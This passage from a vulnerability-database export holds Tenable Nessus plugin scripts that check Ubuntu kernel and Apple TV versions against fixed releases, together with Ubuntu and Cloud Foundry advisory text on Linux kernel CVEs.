code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3753-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3753-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-1028-aws\", pkgver:\"4.4.0-1028.31\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-134-generic\", pkgver:\"4.4.0-134.160~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-134-generic-lpae\", pkgver:\"4.4.0-134.160~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-134-lowlatency\", pkgver:\"4.4.0-134.160~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1028.28\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae-lts-xenial\", pkgver:\"4.4.0.134.114\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lts-xenial\", pkgver:\"4.4.0.134.114\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency-lts-xenial\", pkgver:\"4.4.0.134.114\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:34:18", "bulletinFamily": "scanner", "description": "It was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3753-1.NASL", "href": "https://www.tenable.com/plugins/nessus/112111", "published": "2018-08-24T00:00:00", "title": "Ubuntu 16.04 LTS : linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3753-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3753-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112111);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_xref(name:\"USN\", value:\"3753-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3753-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3753-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3753-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1032-kvm\", pkgver:\"4.4.0-1032.38\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1066-aws\", pkgver:\"4.4.0-1066.76\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1095-raspi2\", pkgver:\"4.4.0-1095.103\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1099-snapdragon\", pkgver:\"4.4.0-1099.104\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-134-generic\", pkgver:\"4.4.0-134.160\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-134-generic-lpae\", pkgver:\"4.4.0-134.160\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-134-lowlatency\", pkgver:\"4.4.0-134.160\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1066.68\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.134.140\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.4.0.134.140\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.4.0.1032.31\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.134.140\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.4.0.1095.95\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.4.0.1099.91\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-17T18:14:15", "bulletinFamily": "scanner", "description": "According to its banner, the version of the remote Apple TV device is\nprior to 9.2.2. It is, therefore, affected by multiple vulnerabilities\nin the following components :\n\n - CoreGraphics\n - ImageIO\n - IOAcceleratorFamily\n - IOHIDFamily\n - Kernel\n - libxml2\n - libxslt\n - Sandbox Profiles\n - WebKit\n - WebKit Page Loading\n\nNote that only 4th generation models are affected by the\nvulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "APPLETV_9_2_2.NASL", "href": "https://www.tenable.com/plugins/nessus/92494", "published": "2016-07-21T00:00:00", "title": "Apple TV < 9.2.2 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92494);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\n \"CVE-2016-1684\",\n \"CVE-2016-1836\",\n \"CVE-2016-1863\",\n \"CVE-2016-1865\",\n \"CVE-2016-4447\",\n \"CVE-2016-4448\",\n \"CVE-2016-4449\",\n \"CVE-2016-4483\",\n \"CVE-2016-4582\",\n \"CVE-2016-4583\",\n \"CVE-2016-4584\",\n \"CVE-2016-4585\",\n \"CVE-2016-4586\",\n \"CVE-2016-4587\",\n \"CVE-2016-4588\",\n \"CVE-2016-4589\",\n \"CVE-2016-4591\",\n \"CVE-2016-4592\",\n \"CVE-2016-4594\",\n \"CVE-2016-4607\",\n \"CVE-2016-4608\",\n \"CVE-2016-4609\",\n \"CVE-2016-4610\",\n \"CVE-2016-4612\",\n \"CVE-2016-4614\",\n \"CVE-2016-4615\",\n \"CVE-2016-4616\",\n \"CVE-2016-4619\",\n \"CVE-2016-4622\",\n \"CVE-2016-4623\",\n \"CVE-2016-4624\",\n \"CVE-2016-4626\",\n \"CVE-2016-4627\",\n \"CVE-2016-4631\",\n \"CVE-2016-4632\",\n \"CVE-2016-4637\",\n \"CVE-2016-4642\",\n \"CVE-2016-4643\",\n \"CVE-2016-4644\",\n \"CVE-2016-4653\"\n );\n script_bugtraq_id(\n 90013,\n 90856,\n 90864,\n 90865,\n 90876,\n 91358,\n 91826,\n 91827,\n 91828,\n 91830,\n 91831,\n 91834\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-07-18-4\");\n\n script_name(english:\"Apple TV < 9.2.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of the remote Apple TV device is\nprior to 9.2.2. It is, therefore, affected by multiple vulnerabilities\nin the following components :\n\n - CoreGraphics\n - ImageIO\n - IOAcceleratorFamily\n - IOHIDFamily\n - Kernel\n - libxml2\n - libxslt\n - Sandbox Profiles\n - WebKit\n - WebKit Page Loading\n\nNote that only 4th generation models are affected by the\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT206905\");\n # https://lists.apple.com/archives/security-announce/2016/Jul/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c0647e9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 9.2.2 or later. Note that this update is\nonly available for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4448\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# fix\nfixed_build = \"13Y825\";\ntvos_ver = '9.2.2'; # for reporting purposes only\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE,\n xss : TRUE\n);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3363.x versions prior to 3363.74\n * 3421.x versions prior to 3421.81\n * 3445.x versions prior to 3445.66\n * 3468.x versions prior to 3468.67\n * 3541.x versions prior to 3541.46\n * 3586.x versions prior to 3586.40\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3363.x versions to 3363.74\n * Upgrade 3421.x versions to 3421.81\n * Upgrade 3445.x versions to 3445.66\n * Upgrade 3468.x versions to 3468.67\n * Upgrade 3541.x versions to 3541.46\n * Upgrade 3586.x versions to 3586.40\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n\n# References\n\n * [USN-3753-2](<https://usn.ubuntu.com/3753-2>)\n * [CVE-2017-13168](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-13168>)\n * [CVE-2018-10876](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10876>)\n * [CVE-2018-10877](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10877>)\n * [CVE-2018-10878](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10878>)\n * [CVE-2018-10879](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10879>)\n * [CVE-2018-10881](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10881>)\n * [CVE-2018-10882](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10882>)\n * [CVE-2018-12233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12233>)\n * 